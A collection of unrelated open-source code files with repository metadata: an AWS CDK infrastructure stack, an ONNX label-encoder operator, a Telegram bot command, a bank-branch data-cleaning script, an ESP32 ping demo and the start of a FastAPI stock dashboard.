roles_environment.get(\"iam_ssm_principal\")\n\n # Bucket\n bucket_environment = environments.get(\"bucket\")\n bucket_name = bucket_environment.get(\"bucket_name\")\n versioned = bucket_environment.get(\"versioned\")\n auto_delete_objects = bucket_environment.get(\"auto_delete_objects\")\n deployment_name = bucket_environment.get(\"deployment_name\")\n asset_bucket = bucket_environment.get(\"asset_bucket\")\n\n # Security Groups\n sgs_environment = environments.get(\"sgs\")\n mngt_sg_name = sgs_environment.get(\"mngt_sg_name\")\n mngt_sg_description = sgs_environment.get(\"mngt_sg_description\")\n mngt_sg_allow_all_outbound = sgs_environment.get(\"mngt_sg_allow_all_outbound\")\n mngt_trusted_ip_ssh = sgs_environment.get(\"mngt_trusted_ip_ssh\")\n mngt_trusted_ip_rdp = sgs_environment.get(\"mngt_trusted_ip_rdp\")\n mngt_sg_ssh_rule_port = sgs_environment.get(\"mngt_sg_ssh_rule_port\")\n mngt_sg_rdp_rule_port = sgs_environment.get(\"mngt_sg_rdp_rule_port\")\n\n asgsg_name = sgs_environment.get(\"asgsg_name\")\n asgsg_description = sgs_environment.get(\"asgsg_description\")\n asgsg_allow_all_outbound = sgs_environment.get(\"asgsg_allow_all_outbound\")\n asgsg_rule_port = sgs_environment.get(\"asgsg_rule_port\")\n asgsg_http_rule_port = sgs_environment.get(\"asgsg_http_rule_port\")\n asgsg_https_rule_port = sgs_environment.get(\"asgsg_https_rule_port\")\n asgsg_elb_port = sgs_environment.get(\"asgsg_elb_port\")\n\n elbsg_name = sgs_environment.get(\"elbsg_name\")\n elbsg_description = sgs_environment.get(\"elbsg_description\")\n elbsg_allow_all_outbound = sgs_environment.get(\"elbsg_allow_all_outbound\")\n elbsg_http_rule_port = sgs_environment.get(\"elbsg_http_rule_port\")\n elbsg_https_rule_port = sgs_environment.get(\"elbsg_https_rule_port\")\n\n # Key Pair\n keypair_environment = environments.get(\"keypair\")\n mngt_kp = keypair_environment.get(\"mngt_kp\")\n mngt_kp_name = keypair_environment.get(\"mngt_kp_name\")\n mngt_kp_description = keypair_environment.get(\"mngt_kp_description\")\n mngt_kp_store = keypair_environment.get(\"mngt_kp_store\")\n\n asg_kp = keypair_environment.get(\"asg_kp\")\n asg_kp_name = keypair_environment.get(\"asg_kp_name\")\n asg_kp_description = keypair_environment.get(\"asg_kp_description\")\n asg_kp_store = keypair_environment.get(\"asg_kp_store\")\n\n # LBS\n lbs_environment = environments.get(\"lbs\")\n lb_name = lbs_environment.get(\"lb_name\")\n lb_if = lbs_environment.get(\"lb_if\")\n list_name = lbs_environment.get(\"list_name\")\n target_group = lbs_environment.get(\"target_group\")\n\n # EC2s\n ec2s_environment = environments.get(\"ec2s\")\n mngt_ec2_name = ec2s_environment.get(\"mngt_ec2_name\")\n mngt_ec2_instance_type = ec2s_environment.get(\"mngt_ec2_instance_type\")\n mngt_ec2_encrypted = ec2s_environment.get(\"mngt_ec2_encrypted\")\n\n asg_ec2_name = ec2s_environment.get(\"asg_ec2_name\")\n asg_ec2_instance_type = ec2s_environment.get(\"asg_ec2_instance_type\")\n asg_ec2_encrypted = ec2s_environment.get(\"asg_ec2_encrypted\")\n asg_delete = ec2s_environment.get(\"asg_delete\")\n\n # Server Script\n webscript_environment = environments.get(\"webscript\")\n wsrv_asset_name = webscript_environment.get(\"wsrv_asset_name\")\n wsrv_asset_path = webscript_environment.get(\"wsrv_asset_path\")\n wsrv_asset_region = webscript_environment.get(\"wsrv_asset_region\")\n\n # Tags\n tags_environment = environments.get(\"tags\")\n mngt_tag_key = tags_environment.get(\"mngt_tag_key\")\n mngt_tag_value = tags_environment.get(\"mngt_tag_value\")\n asg_tag_key = tags_environment.get(\"asg_tag_key\")\n asg_tag_value = tags_environment.get(\"asg_tag_value\")\n\n # Backup Vaults/Plans/Rules\n bus_environment = environments.get(\"bus\")\n mngt_vault_key = bus_environment.get(\"mngt_vault_key\")\n mngt_vault_name = bus_environment.get(\"mngt_vault_name\")\n mngt_backup_vault_name = bus_environment.get(\"mngt_backup_vault_name\")\n mngt_backup_plan = bus_environment.get(\"mngt_backup_plan\")\n mngt_backup_plan_name = bus_environment.get(\"mngt_backup_plan_name\")\n mngt_rule_name = bus_environment.get(\"mngt_rule_name\")\n mngt_minute = bus_environment.get(\"mngt_minute\")\n mngt_hour = bus_environment.get(\"mngt_hour\")\n mngt_month = bus_environment.get(\"mngt_month\")\n mngt_weekday = bus_environment.get(\"mngt_weekday\")\n mngt_duration = bus_environment.get(\"mngt_duration\")\n\n asg_vault_key = bus_environment.get(\"asg_vault_key\")\n asg_vault_name = bus_environment.get(\"asg_vault_name\")\n asg_backup_vault_name = bus_environment.get(\"asg_backup_vault_name\")\n asg_backup_plan = bus_environment.get(\"asg_backup_plan\")\n asg_backup_plan_name = bus_environment.get(\"asg_backup_plan_name\")\n asg_backup_resource = bus_environment.get(\"asg_backup_resource\")\n asg_rule_name = bus_environment.get(\"asg_rule_name\")\n asg_minute = bus_environment.get(\"asg_minute\")\n asg_hour = bus_environment.get(\"asg_hour\")\n asg_month = bus_environment.get(\"asg_month\")\n asg_weekday = bus_environment.get(\"asg_weekday\")\n asg_duration = bus_environment.get(\"asg_duration\")\n\n #################### Create S3 Bucket ####################\n\n ### S3 bucket\n bootstrapbucket = s3.Bucket(\n self,\n bucket_name,\n versioned=versioned,\n encryption=s3.BucketEncryption.KMS,\n removal_policy=cdk.RemovalPolicy.DESTROY,\n auto_delete_objects=auto_delete_objects,\n )\n\n ### S3 Bucket file deployment.\n\n s3deploy.BucketDeployment(\n self,\n deployment_name,\n sources=[s3deploy.Source.asset(asset_bucket)],\n destination_bucket=bootstrapbucket,\n )\n\n #################### VPC's t.b.v. MNGT Server en Autoscaling ####################\n\n ### VPC - Management VPC\n\n self.vpc1 = ec2.Vpc(\n self,\n mngt_name,\n max_azs=mngt_max_azs,\n cidr=mngt_cidr_block,\n subnet_configuration=[\n ec2.SubnetConfiguration(\n subnet_type=ec2.SubnetType.PUBLIC,\n name=mngt_subnet_name,\n cidr_mask=mngt_cidr_mask,\n )\n ],\n )\n\n ### VPC - Autoscaling\n\n self.vpc2 = ec2.Vpc(\n self,\n asg_name,\n nat_gateway_subnets=ec2.SubnetSelection(\n subnet_group_name=public_asg_subnet_name\n ),\n max_azs=asg_max_azs,\n cidr=asg_cidr_block,\n subnet_configuration=[\n ec2.SubnetConfiguration(\n subnet_type=ec2.SubnetType.PUBLIC,\n name=public_asg_subnet_name,\n cidr_mask=asg_cidr_mask,\n ),\n ec2.SubnetConfiguration(\n subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT,\n name=private_asg_subnet_name,\n cidr_mask=asg_cidr_mask,\n ),\n ],\n )\n\n ### VPC Peering\n\n self.cfn_vPCPeering_connection = ec2.CfnVPCPeeringConnection(\n self,\n vpcp_name,\n peer_vpc_id=self.vpc1.vpc_id,\n vpc_id=self.vpc2.vpc_id,\n # Peering Region (optional)\n peer_region=vpcp_region,\n )\n\n ### VPC Peering Connection between VPC1-VPC2\n\n for i in range(0, 2):\n self.cfn_Route = ec2.CfnRoute(\n self,\n \"route_table_id\" + str(i),\n route_table_id=self.vpc.public_subnets[i].route_table.route_table_id,\n destination_cidr_block=self.vpc2.vpc_cidr_block,\n vpc_peering_connection_id=self.VPCPeering.ref,\n )\n i = i + 1\n\n for j in range(0, 2):\n self.cfn_Route = ec2.CfnRoute(\n self,\n \"route_table1_id\" + str(j),\n route_table_id=self.vpc.private_subnets[j].route_table.route_table_id,\n destination_cidr_block=self.vpc2.vpc_cidr_block,\n vpc_peering_connection_id=self.VPCPeering.ref,\n )\n j = j + 1\n\n for k in range(0, 2):\n self.cfn_Route = ec2.CfnRoute(\n self,\n \"route_table2_id\" + str(k),\n route_table_id=self.vpc2.public_subnets[k].route_table.route_table_id,\n destination_cidr_block=self.vpc.vpc_cidr_block,\n vpc_peering_connection_id=self.VPCPeering.ref,\n )\n k = k + 1\n\n #################### Create AMI's ####################\n\n ### AMI Linux\n amzn_linux = ec2.MachineImage.latest_amazon_linux(\n generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2,\n edition=ec2.AmazonLinuxEdition.STANDARD,\n virtualization=ec2.AmazonLinuxVirt.HVM,\n storage=ec2.AmazonLinuxStorage.GENERAL_PURPOSE,\n )\n\n ### AMI Windows\n amzn_windows = ec2.MachineImage.latest_windows(\n ec2.WindowsVersion.WINDOWS_SERVER_2019_ENGLISH_FULL_BASE\n )\n\n #################### Create Roles & Policies ####################\n\n ### Role SSM\n\n role = iam.Role(\n self, iam_ssm_role, assumed_by=iam.ServicePrincipal(iam_ssm_principal)\n )\n role.add_managed_policy(\n iam.ManagedPolicy.from_aws_managed_policy_name(\n \"AmazonSSMManagedInstanceCore\"\n )\n )\n\n #################### Create Security Groups ####################\n\n ### Security Group Management Server\n mngtsg = ec2.SecurityGroup(\n self,\n mngt_sg_name,\n vpc=self.vpc1,\n description=mngt_sg_description,\n allow_all_outbound=mngt_sg_allow_all_outbound,\n )\n iplistssh = mngt_trusted_ip_ssh\n for i in range(len(iplistssh)):\n mngtsg.add_ingress_rule(\n ec2.Peer.ipv4(iplistssh[i] + \"/32\"),\n ec2.Port.tcp(mngt_sg_ssh_rule_port),\n \"allow ssh access from the VPC\",\n )\n\n iplistrdp = mngt_trusted_ip_rdp\n for i in range(len(iplistrdp)):\n mngtsg.add_ingress_rule(\n ec2.Peer.ipv4(iplistrdp[i] + \"/32\"),\n ec2.Port.tcp(mngt_sg_rdp_rule_port),\n \"allow RDP access from the VPC\",\n )\n\n ### Security Group ELB\n elbsg = ec2.SecurityGroup(\n self,\n elbsg_name,\n vpc=self.vpc2,\n description=elbsg_description,\n allow_all_outbound=elbsg_allow_all_outbound,\n )\n\n elbsg.add_ingress_rule(\n ec2.Peer.any_ipv4(),\n ec2.Port.tcp(elbsg_http_rule_port),\n \"allow HTTP traffic from anywhere\",\n )\n\n elbsg.add_ingress_rule(\n ec2.Peer.any_ipv4(),\n ec2.Port.tcp(elbsg_https_rule_port),\n \"allow HTTPS traffic from anywhere\",\n )\n\n ### Security Group ASG\n asgsg = ec2.SecurityGroup(\n self,\n asgsg_name,\n vpc=self.vpc2,\n description=asgsg_description,\n allow_all_outbound=asgsg_allow_all_outbound,\n )\n\n asgsg.add_ingress_rule(\n ec2.Peer.security_group_id(mngtsg.security_group_id),\n ec2.Port.tcp(asgsg_rule_port),\n \"allow access from the MNGT Security Group\",\n )\n\n asgsg.add_ingress_rule(\n ec2.Peer.security_group_id(elbsg.security_group_id),\n ec2.Port.tcp(asgsg_elb_port),\n \"allow access from the ELB Security Group\",\n )\n\n asgsg.add_ingress_rule(\n ec2.Peer.any_ipv4(),\n ec2.Port.tcp(asgsg_http_rule_port),\n \"allow HTTP traffic from anywhere\",\n )\n\n asgsg.add_ingress_rule(\n ec2.Peer.any_ipv4(),\n ec2.Port.tcp(asgsg_https_rule_port),\n \"allow HTTPS traffic from anywhere\",\n )\n\n #################### Create Key Pair ####################\n\n ### key pair Mangement Server\n mngtkey = KeyPair(\n self,\n mngt_kp,\n name=mngt_kp_name,\n description=mngt_kp_description,\n store_public_key=mngt_kp_store,\n )\n\n mngtkey.grant_read_on_private_key(role)\n mngtkey.grant_read_on_public_key(role)\n\n ### key pair webserver\n asgkey = KeyPair(\n self,\n asg_kp,\n name=asg_kp_name,\n description=asg_kp_description,\n store_public_key=asg_kp_store,\n )\n\n asgkey.grant_read_on_private_key(role)\n asgkey.grant_read_on_public_key(role)\n\n #################### Create EC2 Instances ####################\n\n ### Instance Management Server (Windows)\n management_server = ec2.Instance(\n self,\n mngt_ec2_name,\n instance_type=ec2.InstanceType(mngt_ec2_instance_type),\n machine_image=amzn_windows,\n vpc=self.vpc1,\n security_group=mngtsg,\n key_name=mngtkey.key_pair_name,\n block_devices=[\n ec2.BlockDevice(\n device_name=\"/dev/sda1\",\n volume=ec2.BlockDeviceVolume.ebs(30, encrypted=mngt_ec2_encrypted),\n )\n ],\n )\n\n #################### Create Autoscaling ####################\n\n asg = autoscaling.AutoScalingGroup(\n self,\n asg_ec2_name,\n vpc=self.vpc2,\n vpc_subnets=ec2.SubnetType.PUBLIC,\n instance_type=ec2.InstanceType(asg_ec2_instance_type),\n machine_image=amzn_linux,\n key_name=asgkey.key_pair_name,\n role=role,\n security_group=asgsg,\n desired_capacity=1,\n max_capacity=3,\n min_capacity=1,\n block_devices=[\n autoscaling.BlockDevice(\n device_name=\"/dev/xvda\",\n volume=autoscaling.BlockDeviceVolume.ebs(\n volume_size=8,\n encrypted=asg_ec2_encrypted,\n delete_on_termination=asg_delete,\n ),\n )\n ],\n )\n\n ### Launch script to install webserver\n\n assets = Asset(\n self,\n wsrv_asset_name,\n path=wsrv_asset_path,\n )\n\n Local_path = asg.user_data.add_s3_download_command(\n bucket=assets.bucket,\n bucket_key=assets.s3_object_key,\n region=wsrv_asset_region,\n )\n\n asg.user_data.add_execute_file_command(file_path=Local_path)\n\n assets.grant_read(asg.role)\n\n #################### Create Tags ####################\n\n Tags.of(management_server).add(mngt_tag_key, mngt_tag_value)\n Tags.of(asg).add(asg_tag_key, asg_tag_value)\n\n #################### Elastic Load Balancer ####################\n\n ### Create the Load Balancer in the Webserver's VPC\n lb = elbv2.ApplicationLoadBalancer(\n self,\n lb_name,\n vpc=self.vpc2,\n internet_facing=lb_if,\n security_group=elbsg,\n load_balancer_name=lb_name,\n )\n\n ### Listener\n listener_certificate = elbv2.ListenerCertificate.from_arn(\n acm.generate_certificate(),\n )\n\n listener = lb.add_listener(\n list_name,\n port=443,\n certificates=[listener_certificate],\n ssl_policy=elbv2.SslPolicy.RECOMMENDED,\n )\n\n ### HTTP => HTTPS redirect\n lb.add_redirect(source_port=80, target_port=443)\n\n ### Health Check\n health_check = elbv2.HealthCheck(\n interval=Duration.seconds(60), path=\"/\", timeout=Duration.seconds(30)\n )\n\n ### Listener connections\n listener.connections.allow_default_port_from_any_ipv4(\"Open to the world\")\n\n ### add target\n listener.add_targets(\n target_group, port=80, targets=[asg], health_check=health_check\n )\n\n ### Autoscaling Action\n asg.scale_on_cpu_utilization(\"scale_on_cpu\", target_utilization_percent=60)\n\n ##################### Create Backup Routines #############################\n\n ### Backup Management Server\n ### Create Backup Vault\n mngtvaultkey = kms.Key(\n self, mngt_vault_key, removal_policy=RemovalPolicy.DESTROY\n )\n mngtvault = backup.BackupVault(\n self,\n mngt_vault_name,\n backup_vault_name=mngt_backup_vault_name,\n encryption_key=mngtvaultkey,\n removal_policy=RemovalPolicy.DESTROY,\n )\n\n ### Create Backup Plan\n mngtplan = backup.BackupPlan(\n self, mngt_backup_plan, backup_plan_name=mngt_backup_plan_name\n )\n\n ### Add Backup Resources through Tags\n mngtplan.add_selection(\n \"Selection\",\n resources=[backup.BackupResource.from_tag(mngt_tag_key, mngt_tag_value)],\n )\n\n ### Create Backup Rule - Each day at 4:30 hrs and keep for 7 days\n mngtplan.add_rule(\n backup.BackupPlanRule(\n backup_vault=mngtvault,\n rule_name=mngt_rule_name,\n schedule_expression=Schedule.cron(\n minute=mngt_minute,\n hour=mngt_hour,\n month=mngt_month,\n week_day=mngt_weekday,\n ),\n delete_after=Duration.days(mngt_duration),\n )\n )\n\n ### Backup Webserver\n ### Create Backup Vault\n asgkey = kms.Key(self, asg_vault_key, removal_policy=RemovalPolicy.DESTROY)\n asgvault = backup.BackupVault(\n self,\n asg_vault_name,\n backup_vault_name=asg_backup_vault_name,\n encryption_key=asgkey,\n removal_policy=RemovalPolicy.DESTROY,\n )\n\n ### Create Backup Plan\n asgplan = backup.BackupPlan(\n self, asg_backup_plan, backup_plan_name=asg_backup_plan_name\n )\n\n ### Add Backup Resources through Tags\n asgplan.add_selection(\n asg_backup_resource,\n resources=[backup.BackupResource.from_tag(asg_tag_key, asg_tag_value)],\n )\n\n ### Create Backup Rule - Once a week and save 1\n asgplan.add_rule(\n backup.BackupPlanRule(\n backup_vault=asgvault,\n rule_name=asg_rule_name,\n schedule_expression=Schedule.cron(\n minute=asg_minute,\n hour=asg_hour,\n month=asg_month,\n week_day=asg_weekday,\n ),\n delete_after=Duration.days(asg_duration),\n )\n )\n","repo_name":"techgrounds/cloud-6-repo-henkvanderduim","sub_path":"mvpfinal/mvpfinal/old_code.py","file_name":"old_code.py","file_ext":"py","file_size_in_byte":21622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7951938110","text":"import numpy as np\n\nfrom onnx.reference.ops.aionnxml._op_run_aionnxml import OpRunAiOnnxMl\n\n\nclass LabelEncoder(OpRunAiOnnxMl):\n def _run( # type: ignore\n self,\n x,\n default_float=None,\n default_int64=None,\n default_string=None,\n keys_floats=None,\n keys_int64s=None,\n keys_strings=None,\n values_floats=None,\n values_int64s=None,\n values_strings=None,\n ):\n keys = keys_floats or keys_int64s or keys_strings\n values = values_floats or values_int64s or values_strings\n classes = dict(zip(keys, values))\n if id(keys) == id(keys_floats):\n cast = float\n elif id(keys) == id(keys_int64s):\n cast = int # type: ignore\n else:\n cast = str # type: ignore\n if id(values) == id(values_floats):\n defval = default_float\n dtype = np.float32\n elif id(values) == id(values_int64s):\n defval = default_int64\n dtype = np.int64 # type: ignore\n else:\n defval = default_string\n if not isinstance(defval, str):\n defval = \"\"\n dtype = np.str_ # type: ignore\n shape = x.shape\n if len(x.shape) > 1:\n x = x.flatten()\n res = []\n for i in range(0, x.shape[0]):\n v = classes.get(cast(x[i]), defval)\n res.append(v)\n return (np.array(res, dtype=dtype).reshape(shape),)\n","repo_name":"PERMAPOG/codeCrafters","sub_path":".venv/Lib/site-packages/onnx/reference/ops/aionnxml/op_label_encoder.py","file_name":"op_label_encoder.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"71026950674","text":"from telegram import InlineKeyboardMarkup\n\nfrom bot.commands import BaseCommand\n\nimport mongo\n\n\nclass ToggleDailyTaskCommand(BaseCommand):\n\n _COMMAND = 'mark_daily_task'\n _DESCRIPTION = 'Mark your daily tasks complete/incomplete'\n\n def _call(self, update, context):\n if not context.args:\n update.message.reply_text('Task name is required.')\n return\n\n ok = mongo.daily_tasks.toggle_task(\n update.message.chat.id,\n context.args[0],\n )\n if not ok:\n update.message.reply_text('Task was not found')\n return\n\n update.message.reply_text('Task toggled')\n return True\n\n def _callback_query_execute(self, bot, update, **kwargs):\n from bot.commands.daily_tasks import common\n\n mongo.daily_tasks.toggle_task(\n update.callback_query.message.chat.id,\n update.callback_query.data.split()[1],\n )\n\n update.callback_query.message.edit_text(\n text=common.get_tasks_list_text(),\n reply_markup=InlineKeyboardMarkup(common.get_tasks_markup(update.callback_query.message.chat.id)),\n )\n return True\n","repo_name":"aq1/artificial_human_bot","sub_path":"bot/commands/daily_tasks/toggle_daily_task.py","file_name":"toggle_daily_task.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"70359731154","text":"# -*- coding: utf-8 -*-\n\"\"\"华夏银行网点 HXBORGANIZE 有经纬度\"\"\"\nfrom branch_scripts import GenericScript\nfrom database._mongodb import MongoClient\n\n\ndef data_shuffle(data, province_list, city_list, area_list):\n for city in city_list:\n if city[\"NAME_\"] == \"县\":\n city_list.remove(city)\n\n re_data = dict()\n prov_n = None\n prov_c = None\n city_n = None\n city_c = None\n area_n = None\n area_c = None\n addr_ = None\n\n # 省级信息清洗\n for prov in province_list:\n if prov[\"NAME_\"][:2] == data[\"PROVINCE_NAME_\"][:2]:\n prov_n = prov[\"NAME_\"]\n prov_c = prov[\"CODE_\"]\n break\n if prov_c[:2] != data[\"CITY_CODE_\"][:2]:\n data[\"CITY_CODE_\"] = \"\"\n\n # 市级信息清洗\n for area in area_list:\n if area[\"CODE_\"] == data[\"CITY_CODE_\"]:\n area_n = area[\"NAME_\"]\n area_c = area[\"CODE_\"]\n city_c = area[\"CODE_\"][:-2] + \"00\"\n for city in city_list:\n if city[\"CODE_\"] == data[\"CITY_CODE_\"]:\n city_n = city[\"NAME_\"]\n city_c = city[\"CODE_\"]\n elif city[\"CODE_\"] == city_c:\n city_n = city[\"NAME_\"]\n for prov in province_list:\n if prov[\"CODE_\"] == data[\"CITY_CODE_\"]:\n city_n = prov[\"NAME_\"]\n city_c = prov[\"CODE_\"]\n # print(data[\"ADDR_\"], data[\"PROVINCE_NAME_\"], prov_n)\n elif prov[\"NAME_\"] in data[\"ADDR_\"][:len(prov[\"NAME_\"])]:\n prov_n = prov[\"NAME_\"]\n prov_c = prov[\"CODE_\"]\n if not city_c:\n for city in city_list:\n if city[\"NAME_\"] in data[\"ADDR_\"][:len(city[\"NAME_\"])+4]:\n city_c = city[\"CODE_\"]\n city_n = city[\"NAME_\"]\n if city_c[:2] != prov_c[:2]:\n prov_c = city_c[:2] + \"00\"\n for prov in province_list:\n if prov_c == prov[\"NAME_\"]:\n prov_n = prov[\"NAME_\"]\n break\n if not city_c:\n if prov_n == \"天津市\":\n city_n = \"天津市\"\n city_c = \"120100\"\n elif data[\"NAME_\"] == \"新塘支行\":\n city_n = \"广州市\"\n city_c = \"440100\"\n data[\"ADDR_\"] = data[\"ADDR_\"].replace(\"广州\", \"广州市\")\n elif data[\"ADDR_\"] == \"天津市宝坻区新都汇广场1-1-105\":\n prov_n = \"天津市\"\n prov_c = \"1200\"\n city_n = \"天津市\"\n city_c = \"120100\"\n\n # 区级县级信息清洗\n for area in area_list:\n if area[\"CODE_\"][:2] == prov_c[:2]:\n if area[\"NAME_\"] in data[\"ADDR_\"]:\n area_n = area[\"NAME_\"]\n area_c = area[\"CODE_\"]\n # 其余无法匹配到区县级\n # if not area_c:\n # print(prov_c, prov_n, city_c, city_n, data[\"ADDR_\"])\n\n # 特殊情况\n if data[\"NAME_\"] == \"西咸新区分行营业部\":\n data[\"LNG_\"] = \"108.73137\"\n data[\"LAT_\"] = \"34.322323\"\n prov_c = \"6100\"\n prov_n = \"陕西省\"\n city_c = \"610400\"\n city_n = \"咸阳市\"\n area_c = \"610402\"\n area_n = \"秦都区\"\n\n # 地址清洗\n if prov_n in data[\"ADDR_\"]:\n addr_ = data[\"ADDR_\"]\n elif prov_n[:-1] in data[\"ADDR_\"][:len(prov_n)]:\n addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:-1], prov_n) + data[\"ADDR_\"][len(prov_n):]\n elif prov_n[:4] in data[\"ADDR_\"][:len(prov_n)]:\n addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:4], prov_n) + data[\"ADDR_\"][len(prov_n):]\n elif prov_n[:3] in data[\"ADDR_\"][:len(prov_n)]:\n addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:3], prov_n) + data[\"ADDR_\"][len(prov_n):]\n elif prov_n[:2] in data[\"ADDR_\"][:len(prov_n)]:\n addr_ = data[\"ADDR_\"][:len(prov_n)].replace(prov_n[:2], prov_n) + data[\"ADDR_\"][len(prov_n):]\n else:\n addr_ = prov_n + data[\"ADDR_\"]\n\n if city_n in addr_[:len(prov_n) + len(city_n)]:\n addr_ = addr_\n elif city_n[:-1] in addr_[:len(prov_n) + len(city_n)]:\n addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n city_n[:-1], city_n) + addr_[len(prov_n) + len(city_n):]\n elif city_n[:4] in addr_[:len(prov_n) + len(city_n)]:\n addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n city_n[:4], city_n) + addr_[len(prov_n) + len(city_n):]\n elif city_n[:3] in addr_[:len(prov_n) + len(city_n)]:\n addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n city_n[:3], city_n) + addr_[len(prov_n) + len(city_n):]\n elif city_n[:2] in addr_[:len(prov_n) + len(city_n)]:\n addr_ = addr_[:len(prov_n) + len(city_n)].replace(\n city_n[:2], city_n) + addr_[len(prov_n) + len(city_n):]\n else:\n addr_ = addr_[:len(prov_n)] + city_n + addr_[len(prov_n):]\n\n # # 添加分行编码\n # branch_code = None\n # for i in range(1, 10000):\n # branch_code = \"HXB\" + \"_\" + city_c + \"_\" + \"00000\"\n # branch_code = branch_code[:len(branch_code) - len(str(i))] + \"{}\".format(i)\n # if branch_code in branch_code_list:\n # continue\n # else:\n # branch_code_list.append(branch_code)\n # break\n\n # \"C\"\n hash_m = hashlib.md5()\n hash_m.update(data[\"NAME_\"].encode(\"utf-8\"))\n hash_title = hash_m.hexdigest()\n re_data[\"ID_\"] = (data[\"ENTITY_CODE_\"] + \"_\" +\n str(9999999999 - int(float(data[\"DEALTIME_\"]))) + \"_\" + str(hash_title))\n re_data[\"BANK_CODE_\"] = \"HXB\"\n re_data[\"BANK_NAME_\"] = data[\"ENTITY_NAME_\"][:-2]\n re_data[\"CREATE_TIME_\"] = data[\"DATETIME_\"]\n re_data[\"AREA_CODE_\"] = area_c\n re_data[\"UNIT_CODE_\"] = \"HXB\" + \"_\" + city_c\n\n # \"F\"\n re_data[\"ADDR_\"] = addr_\n re_data[\"CITY_CODE_\"] = city_c\n re_data[\"CITY_\"] = city_n\n re_data[\"LAT_\"] = data[\"LAT_\"]\n re_data[\"LNG_\"] = data[\"LNG_\"]\n re_data[\"NAME_\"] = data[\"NAME_\"]\n re_data[\"PROVINCE_CODE_\"] = prov_c\n re_data[\"PROVINCE_NAME_\"] = prov_n\n re_data[\"DISTRICT_CODE_\"] = area_c\n re_data[\"DISTRICT_NAME_\"] = area_n\n re_data[\"ENTITY_CODE_\"] = data[\"ENTITY_CODE_\"]\n re_data[\"DEALTIME_\"] = data[\"DEALTIME_\"]\n re_data[\"URL_\"] = data[\"URL_\"]\n re_data[\"TEL_\"] = data[\"TEL_\"]\n re_data[\"BUSINESS_HOURS_\"] = data[\"BUSINESS_HOURS_\"]\n\n # \"S\"\n re_data[\"STATUS_1\"] = \"1\"\n\n return re_data\n\n\nif __name__ == '__main__':\n main_mongo = MongoClient(entity_code=\"HXBORGANIZE\", mongo_collection=\"WD_TY\")\n sc = GenericScript\n # Mysql connection\n sc.mysql_client, sc.mysql_connection = sc.mysql_connect()\n province_list, city_list, area_list, dir_area_list, bank_list = sc.data_from_mysql()\n data_list = main_mongo.main()\n for data in data_list:\n re_data = data_shuffle(data, province_list, city_list, area_list)\n # print(re_data)\n","repo_name":"ILKKAI/dataETL","sub_path":"datashufflepy-zeus/src/branch_scripts2/SURROUNDING_FACILITIES/WD_TY/HXBORGANIZE.py","file_name":"HXBORGANIZE.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13688462632","text":"# https://pl.spoj.com/problems/PP0504B/\n\n\ndef concat(a,b):\n lenA = len(a)\n lenB = len(b)\n minLen = min(lenA,lenB)\n\n result = \"\"\n for i in range(minLen):\n if(i == lenA): return result\n result += a[i]\n if(i == lenB): return result\n result += b[i]\n return result\n\nt = int(input())\nwhile(t>0):\n left,right = input().split()\n print(concat(left,right))\n t-=1","repo_name":"MatDemn/SPOJ","sub_path":"PP0504B.py","file_name":"PP0504B.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"33501915797","text":"from network_esp32 import wifi\n\nSSID = \"Sipeed_2.4G\"\nPASW = \"XXXXXXXX\"\n\nif wifi.isconnected() == False:\n for i in range(5):\n try:\n wifi.reset()\n print('try AT connect wifi...')\n wifi.connect(SSID, PASW)\n if wifi.isconnected():\n break\n except Exception as e:\n print(e)\nprint('network state:', wifi.isconnected(), wifi.ifconfig())\n\nprint(\"ping baidu.com:\", wifi.nic.ping(\"baidu.com\"), \"ms\")\nwifi.nic.disconnect()\n\n'''\n ESP32_SPI firmware version: 1.4.0\n try AT connect wifi...\n network state: True ('192.168.0.180', '255.255.255.0', '192.168.0.1')\n ping baidu.com: 40 ms\n >\n MicroPython v0.5.1-136-g039f72b6c-dirty on 2020-11-18; Sipeed_M1 with kendryte-k210\n Type \"help()\" for more information.\n >>>\n'''\n","repo_name":"sipeed/MaixPy_scripts","sub_path":"network/demo_esp32_ping.py","file_name":"demo_esp32_ping.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":597,"dataset":"github-code","pt":"84"} +{"seq_id":"39664886028","text":"import models\nimport yfinance\nfrom sqlalchemy.orm import Session\nfrom database import SessionLocal, engine\nfrom fastapi import FastAPI, Request, Depends, BackgroundTasks\nfrom fastapi.templating import Jinja2Templates\nfrom pydantic import BaseModel\nfrom models import Stocks\n\napp = FastAPI()\n\nmodels.Base.metadata.create_all(bind=engine)\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\nclass StockRequest(BaseModel):\n\tsymbol: str\n\n\ndef get_db():\n\ttry:\n\t\tdb = SessionLocal()\n\t\tyield db\n\tfinally:\n\t\tdb.close()\n\n\n#Displays stock dashboard\n@app.get(\"/\")\ndef stock_dashboard(request: Request, forward_pe = None, dividend_yield = None, ma50 = None, ma200 = None, db: Session = Depends(get_db)):\n stocks = db.query(Stocks)\n\n if forward_pe:\n \t\tstocks = stocks.filter(Stocks.forward_pe < forward_pe)\n\n if dividend_yield:\n \t\tstocks = stocks.filter(Stocks.dividend_yield < dividend_yield)\n\n if ma50: \n \t\tstocks = stocks.filter(Stocks.price > Stock.ma50)\n \n if ma200:\n \t\tstocks = stocks.filter(Stocks.price > Stock.ma200)\n \t\t\n\t\n\n \n \t#going back to the tempalte\n return templates.TemplateResponse(\"dashboard.html\",{\n \t\"request\" : request,\n \t\"stocks\" : stocks,\n \t\"dividend_yield\" : dividend_yield,\n \t\"forward_pe\" : 